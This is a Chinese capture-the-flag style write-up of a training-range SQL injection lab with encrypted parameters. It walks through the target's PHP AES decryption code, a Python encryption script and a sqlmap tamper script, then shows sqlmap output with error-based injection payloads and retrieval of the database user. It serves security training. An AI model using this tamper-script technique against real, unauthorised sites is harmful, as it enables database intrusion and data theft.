墨者靶场:SQL注入漏洞测试(参数加密) 使用sqlmap进行注入

前言

首先这是一个很基础的题,实战中也会遇到。比如说前端利用JavaScript公钥加密并传输给后端,后端通过私钥进行解密执行。这样做的好处就在于可以有效的避免了中间人攻击。跟SSL原理差不多 只是SSL在传输层做的 这种加密在应用层做的。

我从来不写百度能查到的writeup,因为这种行为是无意义的。要写就写一些干货。这才是文章的价值。

推荐看这篇文章之前请先移步百度,查一下之前的一些步骤是如何来的。

0x01 源码分析

首先来看下后端的PHP源码

function decode($data){

$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');

mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');

$data = mdecrypt_generic($td,base64_decode(base64_decode($data)));

mcrypt_generic_deinit($td);

mcrypt_module_close($td);

if(substr(trim($data),-6)!=='_mozhe'){

echo '';

}else{

return substr(trim($data),0,strlen(trim($data))-6);

}

}

这是一个解密函数,我们来逐条分析。在

$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');

首先定义了一个变量,这个变量调用了打开PHP crypto库中的加密函数。定义了加密方法为AES加密,加密模式为CBC,数据块为128位

mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');

初始化加密缓冲区 描述为变量td

加密密钥为:ydhaqPQnexoaDuW3

向量偏移为:2018201920202021

$data = mdecrypt_generic($td,base64_decode(base64_decode($data)));

进行两次base64的解密后 使用上述方法进行将加密的密文还原成明文。

mcrypt_generic_deinit($td);

mcrypt_module_close($td);

结束加密 关闭加密模块

if(substr(trim($data),-6)!=='_mozhe'){

echo '';

}else{

return substr(trim($data),0,strlen(trim($data))-6);

}

如果明文的后6位不是_mozhe,那么解密函数将不返回数据 并且跳转到index.php上

如果明文后6位是_mozhe 那么将返回加密值,并且去掉后面的_mozhe

0x02 使用python构造加密函数

既然都已经知道了解密函数的写法,那就反推写出加密函数就好了

#!/usr/bin/env python

# -*- encoding: utf-8 -*-

'''

home.php?mod=space&uid=210785    :   cryptomozhe.py

@Author  :   Angel

home.php?mod=space&uid=163876    :   W3bSafe

'''

from base64 import b64decode,b64encode

from Crypto.Cipher import  AES

def encrypt(text):

cryptor = AES.new('ydhaqPQnexoaDuW3', AES.MODE_CBC, IV="2018201920202021")

length = 16

count = len(text)

add=count % length

if add:

text = text + ('\0' * (length-add))

ciphertext = cryptor.encrypt(text)

return b64encode(b64encode(ciphertext))

def decrypt(text):

cryptor = AES.new('ydhaqPQnexoaDuW3', AES.MODE_CBC, IV="2018201920202021")

length = 16

count = len(text)

add=count % length

if add:

text = text + ('\0' * (length-add))

ciphertext = cryptor.decrypt(b64decode(b64decode(text)))

return ciphertext

if __name__ == '__main__':

print("encrypt:"+encrypt(str(raw_input("Please input text with encrypt:"))))

print("decrypt:"+decrypt(str(raw_input("Please input text with decrypt:"))))

来尝试下写的加解密脚本是否正确与通用,首先我们先用这个Python脚本对

明文:This is a test value_mozhe

进行加密,得到加密后的结果为

密文:ZFR1dE9MS3NNM1p4c3hxVng2YmlBVzVEYWFkVE5nNGdseW04RFh6MWF5OD0=

Please input text with encrypt:This is a test value_mozhe

encrypt:ZFR1dE9MS3NNM1p4c3hxVng2YmlBVzVEYWFkVE5nNGdseW04RFh6MWF5OD0=

Please input text with decrypt:ZFR1dE9MS3NNM1p4c3hxVng2YmlBVzVEYWFkVE5nNGdseW04RFh6MWF5OD0=

decrypt:This is a test value_mozhe

然后在写一个PHP文件,使用题目中所给的php函数对刚刚加密过的密文进行解密

function decode($data){

$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');

mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');

$data = mdecrypt_generic($td,base64_decode(base64_decode($data)));

mcrypt_generic_deinit($td);

mcrypt_module_close($td);

if(substr(trim($data),-6)!=='_mozhe'){

echo '';

}else{

return substr(trim($data),0,strlen(trim($data))-6);

}

}

$val="ZFR1dE9MS3NNM1p4c3hxVng2YmlBVzVEYWFkVE5nNGdseW04RFh6MWF5OD0=";

echo decode($val);

执行结果:

解密成功

0x03 构造sqlmap tamper脚本 进行注入测试

已经验证了python加密函数的可行性,那么直接把构造好的加密函数写成sqlmap能运行的tamper脚本就ok了。别忘了要在明文后面加上_mozhe

#!/usr/bin/env python

# -*- encoding: utf-8 -*-

'''

@File    :   mozhe.py

@Author  :   Angel

@Team    :   W3bSafe

'''

import base64

from Crypto.Cipher import  AES

from lib.core.enums import PRIORITY

from lib.core.settings import UNICODE_ENCODING

__priority__ = PRIORITY.LOW

def encrypt(text):

cryptor = AES.new('ydhaqPQnexoaDuW3', AES.MODE_CBC, IV="2018201920202021")

length = 16

count = len(text)

add=count % length

if add:

text = text + ('\0' * (length-add))

ciphertext = cryptor.encrypt(text)

return base64.b64encode(ciphertext)

def dependencies():

pass

def tamper(payload, **kwargs):

payload=encrypt((payload+"_mozhe").encode('utf-8'))

payload=base64.b64encode(payload)

return payload

让sqlmap加载tamper进行注入测试

PS C:\WINDOWS\system32> sqlmap -u "http://219.153.49.228:40570/news/list.php?id=" --tamper=mozhe --dbms=mysql --technique=E

___

__H__

___ ___[.]_____ ___ ___  {1.2.5.10#dev}

|_ -| . [']     | .'| . |

|___|_  [']_|_|_|__,|  _|

|_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:43:43

[11:43:43] [INFO] loading tamper module 'mozhe'

[11:43:44] [WARNING] provided value for parameter 'id' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly

[11:43:44] [INFO] testing connection to the target URL

[11:43:44] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS

[11:43:44] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable

[11:43:44] [INFO] testing for SQL injection on GET parameter 'id'

[11:43:44] [INFO] testing 'MySQL >= 5.0 与-AND 基于报错注入 - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'

[11:43:44] [INFO] testing 'MySQL >= 5.0 基于报错注入 - Parameter replace (FLOOR)'

[11:43:45] [INFO] GET parameter 'id' is 'MySQL >= 5.0 基于报错注入 - Parameter replace (FLOOR)' injectable

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 9 HTTP(s) requests:

---

Parameter: id (GET)

Type: error-based

Title: MySQL >= 5.0 基于报错注入 - Parameter replace (FLOOR)

Payload: id=(SELECT 1957 FROM(SELECT COUNT(*),CONCAT(0x7171766b71,(SELECT (ELT(1957=1957,1))),0x71786a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

---

[11:43:47] [WARNING] changes made by tampering scripts are not included in shown payload content(s)

[11:43:47] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu

web application technology: Nginx

back-end DBMS: MySQL >= 5.0

[11:43:47] [INFO] fetched data logged to text files under 'C:\Users\admin\.sqlmap\output\219.153.49.228'

[*] shutting down at 11:43:47

秒出注入 查一下 注入语句

PS C:\WINDOWS\system32> sqlmap -u "http://219.153.49.228:40570/news/list.php?id=" --tamper=mozhe --dbms=mysql --technique=E -v 3 --current-user

___

__H__

___ ___[.]_____ ___ ___  {1.2.5.10#dev}

|_ -| . ["]     | .'| . |

|___|_  [(]_|_|_|__,|  _|

|_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:46:20

[11:46:20] [DEBUG] cleaning up configuration parameters

[11:46:20] [INFO] loading tamper module 'mozhe'

[11:46:20] [DEBUG] setting the HTTP timeout

[11:46:20] [DEBUG] creating HTTP requests opener object

[11:46:20] [DEBUG] forcing back-end DBMS to user defined value

[11:46:21] [WARNING] provided value for parameter 'id' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly

[11:46:21] [INFO] testing connection to the target URL

[11:46:21] [DEBUG] declared web page charset 'utf-8'

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

Type: error-based

Title: MySQL >= 5.0 基于报错注入 - Parameter replace (FLOOR)

Payload: id=(SELECT 1957 FROM(SELECT COUNT(*),CONCAT(0x7171766b71,(SELECT (ELT(1957=1957,1))),0x71786a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Vector: (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

---

[11:46:21] [WARNING] changes made by tampering scripts are not included in shown payload content(s)

[11:46:21] [INFO] testing MySQL

[11:46:21] [DEBUG] searching for error chunk length...

[11:46:21] [PAYLOAD] RFA2U25sUmZkKzFxMWdtL1p2V2UwS0ZLWWVvdGx3cHJSTjRGZm56aDRteHRFdDZWbCtvRzdwK1gzTVV1cnFEaElYVStxcEFoWlg3ZzlkRldQaUFkL0J5Zzc4ZW1XT3pPS09BRU9kM3RodUFWNHdHNUFmQlNsMmh1cVZaQkNLQzRmVlhMUVV3SmVxUUw3RWNpVGdyNGNFbm8rTnZZNnFrK1BVWm1heloyUWNOQjBHUEpTTzIzNmkxVU5hcSs2MkpxUXRIbjNFK2l1dG5lZU8raWhlaUhLTHBRMVdNS3k2RWxaMlZWbnZHaEU4MD0=

[11:46:21] [PAYLOAD] eWhEcGExNjE4RVlaQWxtY0NHc0paRTNKZ3FkQmFYZFBRa3dqRVQ2Z255c2ZqdGtuZHJ3UUV2Z0hxM2ZBVUszOU5wRCtRd3dSamxMQjNNdi9IaG5OV1d0cW5lMERWeTloY1VOTDJ6T2RmT3ZURnk1L29Ici81MmJVR3E2eXFvL0VxUWY4dzM0SGp2WHBidFF1amJHdUJNcGx1djBqbEJQQmljNUpna0RXV1JjVCtYVWhraWRGSDNEN0g5a2Robk9uc0MxUTl1djFuU1c3b3ZER0lVVE1XTWlFdEhYNFhzQWl6dzdvYnZQMWozdz0=

[11:46:21] [PAYLOAD] d3FlMjAyVFRiZVRPaEx1RWVGMW9kajRzUFRVQVkzMmtFMk4vZ0dCOHQranVkZ2o5dkFubnBTY0NWTG5oUnpXUk4wNWN6YXNRQjRWMVBzaFk4ZTBTV3pXMm9mWFRLT0FnNHVFWE1IVjdMNTFhNEs0a2Q4RmNCcmxUd2ZMNjVVOWlpU1llcW9uM1VaTk4wYzN1VWR4aFJvQUpBVG85VFVnd3JXSlE4UHk2UEwzbGMwekhNbFRCVlFpN1RtUU5MN1BDeVBnRUQwQkd5UVJIcGpjS1N0RG5CUWk3N0VyOEI2UWFhRElFSXR2cHFzOD0=

[11:46:21] [PAYLOAD] RDBtcGNRSlpGczgwc2dlMEVoV3A0Y3NJeEJMeEZsU3R2cDFwdGlvUDhDK3ZKeTZjTmN0Y21rSEJRWUZjckU3MWs3SWloWFZYeGR4a29hOUlhSlZJdS9kUmxlWnAxcm1DdGYxeUlEendlSGNKVkZ0WVdMaERob0QvTFdqUFViRDgxeitOVUdHcTdpdWdsRDYvUHMza3dNVU0xRUFDZXZkd1EvelR0cDRVWThEV2pqS05CVEdibDFzWXUwMlNwbzdyWitHK09CVkNlY3hIT3ljYlA0WXRiZ1gzcXBQUFNqbHVEcXF5VHhWUllRTT0=

[11:46:21] [PAYLOAD] RGpHTFQ3b21KMytJL2dMWWs5aTlnWklRTG1rQkYwKzRDYjc5TGxOSnBtVlVxZjRuZ1pBcGVFUk1DS05QNFNIbUVaQlIyZTc4WVJ3djVweHJIMi96K3FkcWs5SkZ6V1B5dWZUSHM1R1I2SCtCYkprNHI5elA0TStVdXJ6RGN0c3NHVytFaERGMCsvcWVmWjNwcncrZXk1VnNtN1hQRWhaOUZUeGxNK3JkeGZsUUtSK2RwR3J1Wm9tOVBDTDFnZncwUkhGa08zWEhmZHg3eHZrTHYxd2FycEtYeVlxMHhxcUo1ZVB2Ym1nbWw5YXFFY3VrNW80SlN6dFBRbU5FNFZRV1FKOWZlcVZpQ21jVUpFcUNFd3BINVE9PQ==

[11:46:21] [DEBUG] performed 5 queries in 0.35 seconds

[11:46:21] [INFO] confirming MySQL

[11:46:21] [PAYLOAD] OTF0QkkwZDFQVm9od003UGR6dUxGS3hrcUlXT3RJSTExUlkrRmpwcjV5cWZ3MTNpc0dia3NUQU11UnR**c4b1RBREhRbHlPL1h6UUJDY01mYmRoQktHcXY0YWdIZVFaZ08va0NNTzdtcms5bGJNQ2VoUUNYeC9weFE5dEZvdzdIdmJuUDJXTzNqdHdNc0VjcnV6ZWw0L3NMRWx5dXdZMzNYUlluUndGMEtLYW9GZ0hvT2FjOWVsdFVWdGdTZEVnQUZ3S1AzRDBYUEdwUUV2UUx1c2RFa041NTF3UERDVlJPcHQzRzdXMEtOSlA0dEJiRXpGeE1zTlUwTmpXTmFCdVNRdG1YaE5WelVldmlxL1VsY1d4bHc9PQ==

[11:46:21] [DEBUG] performed 1 queries in 0.07 seconds

[11:46:21] [PAYLOAD] Q0dLbmNOU1FkMFgybFQ0d1ozS3RNVmtlaTVPdVdrUzg2VzQwRFNXM2ZuYlpMaURTZmd2ZC9NV1U0b2tsT1FxT3FmekJGSjdWR0JiNG5HS3ViMktnNmRTU0xzZit6RkJUcjkvVjF5RlhObzdXdzBjSkpJYW5KaWN0ZU5rU25FcDlKV1poMFRDQzN0bEx0bzJteTBEQVhNbkR1eEJYWjNlOWk1Wkp2OGZ6T3RYS2M1OGJCS2htamQxajdXWmIyZ3V0a0FncFRVMFZCWm1aVVZ4QnhXOEJRTUtWZC9Fd0lmaUdNSlFTNHNrSUV5L1Uxb3hoWVdDcGNFcXpvVXRhUHcrWTlPbXFTb0t1RVBsQXF3bFVCakYzdVljNFRYcTg1Y3hsRjFFcy8wbEY4TTA9

[11:46:21] [DEBUG] performed 1 queries in 0.06 seconds

[11:46:21] [PAYLOAD] ank5ZzZJb3ZNOWFvR2JhQWQrRG9OUmY1MnlIczZMalZiY0IweS9leUp5WitncTlubU5ML0cvT0RmTTV2QmpiRWhiSktMazA0UkNkSEU3ZkJCTmhmNGlrQ0JtMVh2c0xFSGg4STcrTzVObWRpYlNXTUtVY0RpVDcrT3g5czdaTzNmY1NzTnNrSnJ6VmppZ2lNUWI4QVBIajlDVktRdG1yb0ZBcGpXa3N2ejNZbTE1UUZHdnBZSC91U09IM1hCeHg2VlV6Ni9mWHlEZlZ3WDhnSjI4dDJtc3l4SXJlRGVEVjhkZEJKZjg1dWtyVDRZcjFwbWlhRVJPcHJpbThyblFNeHNHKytkT2t1c2tLb2VpdHdSMjJLc09RQlpqam5MbUhaUUZ5Vzc0dkk2SUE9

[11:46:21] [DEBUG] performed 1 queries in 0.06 seconds

[11:46:21] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu

web application technology: Nginx

back-end DBMS: MySQL >= 5.0.0

[11:46:21] [INFO] fetching current user

[11:46:21] [PAYLOAD] dGV3cy9FUklKc3lJei9iV1lzVzhFck5DaDJzY1UvQVV3bXQ4NERwOFRkMi9ncGExU0JLRnNYSitDQ3lVVlZUZmxUcFFDUFRzckhJS2tLVVRDbHlUZjZSenVEWW05aytrN3BYdEwxT3g2aXJLc1BjWXRzZThSa2FiN0FhVkF6Q0RHek5tSFNncjR6RnJ5TjFKRkxZMi9YMmlMV0Zrc3RLbTNCbDFmUzZJTEhPM2l1dGhrRkpDOTh5S1c3S1dGV0E3QTNNaWY4SFNCdHJmS0FpZmQ4ajhBT1d5RjFtaVR5TnBjOGx5WGVxN09kVHJlUFRURTZNL2JCeUNRSnVQa20xWkxZRW9FZytiRzRsZ1lsdzRKa1hPWlE9PQ==

[11:46:21] [INFO] retrieved: root@localhost

[11:46:21] [DEBUG] performed 1 queries in 0.06 seconds

current user:    'root@localhost'

[11:46:21] [INFO] fetched data logged to text files under 'C:\Users\admin\.sqlmap\output\219.153.49.228'

[*] shutting down at 11:46:21

PS C:\WINDOWS\system32>

对sqlmap的payload进行测试

完成

最后

这是我在bugfor上投的第一篇文章,大佬们勿喷。

墨者mysql注入_墨者靶场:SQL注入漏洞测试(参数加密) 使用sqlmap进行注入相关推荐

  1. SQL注入漏洞测试(参数加密)

    SQL注入漏洞测试(参数加密) <此WEB业务环境对参数进行了AES加密,为了防止参数产生SQL注入,也是防止SQL注入产生的一种方法,但是这种方式就安全了么?1.掌握信息泄露的方式:2.了解A ...

  2. 为什么preparedstatement能防止sql注入_使用Python防止SQL注入攻击的实现示例

    文章背景 每隔几年,开放式Web应用程序安全项目就会对最关键的Web应用程序安全风险进行排名.自第一次报告以来,注入风险高居其位!在所有注入类型中,SQL注入是最常见的攻击手段之一,而且是最危险的.由 ...

  3. sql 整改措施 注入_记一次Sql注入 解决方案

    老大反馈代码里面存在sql注入,这个漏洞会导致系统遭受攻击,定位到对应的代码,如下图所示 image like 进行了一个字符串拼接,正常的情况下,前端传一个 cxk 过来,那么执行的sql就是 se ...

  4. mysql exp 注入_使用exp进行SQL报错注入

    0x01 前言概述 好消息好消息-作者又在MySQL中发现了一个Double型数据溢出.如果你想了解利用溢出来注出数据,你可以读一下作者之前发的博文:BIGINT Overflow Error bas ...

  5. 1000并发 MySQL数据库_再送一波干货,测试2000线程并发下同时查询1000万条数据库表及索引优化...

    继上篇文章<绝对干货,教你4分钟插入1000万条数据到mysql数据库表,快快进来>发布后在博客园首页展示得到了挺多的阅读量,我这篇文章就是对上篇文章的千万级数据库表在高并发访问下如何进行 ...

  6. java代码执行mysql语句_三种执行SQL语句的的JAVA代码

    问题描述: 连接数据库,执行SQL语句是必不可少的,下面给出了三种执行不通SQL语句的方法. 1.简单的Statement执行SQL语句.有SQL注入,一般不使用. public static voi ...

  7. isql 测试mysql连接_[libco] 协程库学习,测试连接 mysql

    历史原因,一直使用 libev 作为服务底层:异步框架虽然性能比较高,但新人学习和使用门槛非常高,而且串行的逻辑被打散为状态机,这也会严重影响生产效率. 用同步方式实现异步功能,既保证了异步性能优势, ...

  8. jsp工程防止外部注入_防止 jsp被sql注入的五种方法

    一.SQL注入简介 SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无帐号登录,甚至篡改数据库. 二.SQL注入攻击的总体 ...

  9. 建立学生选课表 mysql 语句_学生选课数据库SQL语句45道练习题整理及mysql常用函数(20161019)...

    学生选课数据库SQL语句45道练习题: 一.            设有一数据库,包括四个表:学生表(Student).课程表(Course).成绩表(Score)以及教师信息表(Teacher).四 ...

  10. sql 存储过程 盲注入_一次非常规 SQL 注入(informixsql)的利用过程

    介绍 一个客户正在寻找升级他们的思科 UCM 软件,并希望保证他们的实现是安全配置的.在评估期间,我们在 Cisco UCM 管理员门户中发现了一个经过身份验证的 SQL 注入问题.在大多数情况下,可 ...

最新文章

  1. HTML带有圆点的列表,HTML 列表
  2. c++中lambda表达式用法
  3. python wx模块下choice列表框值怎么更新_wx python
  4. jetty9更改post请求长度
  5. 斯坦福CS231n—深度学习与计算机视觉----学习笔记 课时11
  6. Maven仓库—Nexus环境搭建及使用
  7. 作为大数据开发中最重要技术,spark需要掌握哪些技能呢
  8. linux磁盘满了怎么转移,linux 磁盘转移空间的方法
  9. CTF Crypto 入门练习
  10. uniapp app 腾讯云 IM 通讯 封装基础登录方法
  11. 关于量子领域的一些概念
  12. 泰坦尼克号各种因素对存活率的影响
  13. 为什么我会感到迷茫? 文/江湖一剑客
  14. HTML将div层级升到最高,CSS层级嵌套关系详解
  15. 引爆寒假招生——圣诞节活动方案大放送
  16. VSCode已经设置过为中文但变成英文的解决办法
  17. I-Deas TMG 培训资料 (1)
  18. FACIAL: Synthesizing Dynamic Talking Face with Implicit Attribute Learning(论文翻译)
  19. centos关闭自动锁屏
  20. 学习python数据分析路线图_henry_dx_新浪博客

热门文章

  1. 51定时器PWM调节
  2. Springboot JPA注解@Enumerated
  3. (最小割求最小割集)poweroj2883病毒侵染
  4. 如何将虚拟机上的文件复制到主机上
  5. android 11.0 12.0Launcher3去掉默认的google搜索栏
  6. 谷歌浏览器网页截屏插件工具下载与安装——FireShot
  7. Excel怎么实现表格数据行间随机打乱排序
  8. 数据链路层的主要功能
  9. 【Keil 5】STM32F401CCU6 固件库配置(超详细教程)
  10. xul界面编程语法_探索XUL中的多线程编程